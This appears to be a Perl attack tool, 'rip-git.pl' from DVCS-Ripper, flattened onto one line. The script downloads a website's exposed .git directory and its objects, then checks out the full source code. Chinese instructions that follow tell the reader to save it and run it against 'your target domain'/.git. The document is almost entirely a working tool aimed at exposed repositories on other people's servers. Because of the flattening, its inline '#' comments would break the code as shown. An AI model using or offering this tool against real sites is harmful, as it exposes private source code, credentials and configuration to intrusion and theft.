#!/usr/bin/perl use strict; use LWP; use LWP::UserAgent; use HTTP::Request; use Getopt::Long; my $configfile="$ENV{HOME}/.rip-git"; my %config; $config{'branch'} = "master"; $config{'gitdir'} = ".git"; $config{'agent'} = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:10.0.2) Gecko/20100101 Firefox/10.0.2'; $config{'verbose'}=0; $config{'checkout'}=1; if (-e $configfile) { open(CONFIG,"<$configfile") or next; while (<CONFIG>) { chomp; # no newline s/#.*//; # no comments s/^\s+//; # no leading white s/\s+$//; # no trailing white next unless length; # anything left? my ($var, $value) = split(/\s*=\s*/, $_, 2); $config{$var} = $value; } close(CONFIG); } Getopt::Long::Configure ("bundling"); my $result = GetOptions ( "a|agent=s" => \$config{'agent'}, "b|branch=s" => \$config{'branch'}, "u|url=s" => \$config{'url'}, "c|checkout!" => \$config{'checkout'}, "s|verifyssl!" => \$config{'verifyssl'}, "v|verbose+" => \$config{'verbose'}, "h|help" => \&help ); my @gitfiles=( "COMMIT_EDITMSG", "config", "description", "HEAD", "index", "packed-refs" ); my @commits; my $ua = LWP::UserAgent->new; $ua->agent($config{'agent'}); my $gd=$config{'gitdir'}."/"; mkdir $gd; print STDERR "[i] Downloading git files from $config{'url'}\n" if ($config{'verbose'}>0); foreach my $file (@gitfiles) { my $furl = $config{'url'}."/".$file; getfile($file,$gd.$file); } mkdir $gd."logs"; mkdir $gd."logs/refs"; mkdir $gd."logs/refs/heads"; mkdir $gd."logs/refs/remotes"; mkdir $gd."objects"; mkdir $gd."objects/info"; mkdir $gd."objects/pack"; getfile("objects/info/alternates",$gd."objects/info/alternates"); mkdir $gd."info"; getfile("info/grafts",$gd."info/grafts"); my $res = getfile("logs/HEAD",$gd."logs/HEAD"); my @lines = split /\n/, $res->content; foreach my $line (@lines) { my @fields=split(/\s+/, $line); my $ref = $fields[1]; getobject($gd,$ref); } mkdir $gd."refs"; mkdir $gd."refs/heads"; my $res = getfile("refs/heads/".$config{'branch'},$gd."refs/heads/".$config{'branch'}); mkdir $gd."refs/remotes"; mkdir $gd."refs/tags"; my $pcount=1; while ($pcount>0) { print STDERR "[i] Running git fsck to check for missing items\n" if ($config{'verbose'}>0); open(PIPE,"git fsck |") or die "cannot find git: $!"; $pcount=0; while (<PIPE>) { chomp; if (/^missing/) { my @getref = split (/\s+/); getobject($gd,$getref[2]); # 3rd field is sha1 $pcount++; } } close(PIPE); print STDERR "[i] Got items with git fsck: $pcount\n" if ($config{'verbose'}>0); } if ($config{'checkout'}) { system("git checkout -f"); } sub getobject { my ($gd,$ref) = @_; my $rdir = substr ($ref,0,2); my $rfile = substr ($ref,2); mkdir $gd."objects/$rdir"; getfile("objects/$rdir/$rfile",$gd."objects/$rdir/$rfile"); } sub getfile { my ($file,$outfile) = @_; my $furl = $config{'url'}."/".$file; my $req = HTTP::Request->new(GET => $furl); # Pass request to the user agent and get a response back my $res = $ua->request($req); if ($res->is_success) { print STDERR "[d] found $file\n" if ($config{'verbose'}>0);; open (out,">$outfile") or die ("cannot open file: $!"); print out $res->content; close (out); } else { print STDERR "[!] Not found for $file: ".$res->status_line."\n" if ($config{'verbose'}>0); } return $res; } sub help { print "DVCS-Ripper: rip-git.pl. Copyright (C) Kost. Distributed under GPL.\n\n"; print "Usage: $0 [options] -u [giturl] \n"; print "\n"; print " -c perform 'git checkout -f' on end (default)\n"; print " -b <s> Use branch <s> (default: $config{'branch'})\n"; print " -a <s> Use agent <s> (default: $config{'agent'})\n"; print " -s verify SSL cert\n"; print " -v verbose (-vv will be more verbose)\n"; print "\n"; print "Example: $0 -v -u http://www.example.com/.git/\n"; print "Example: $0 # with url and options in $configfile\n"; exit 0; }
注意这一句:print “Example: $0 -v -u http://www.example.com/.git/\n”; 大概形式就是文件名 -v -u url。
将上面的代码保存成1.pl,然后在cmd下执行:perl 1.pl -v -u http://域名,此处替换成你的目标域名/.git。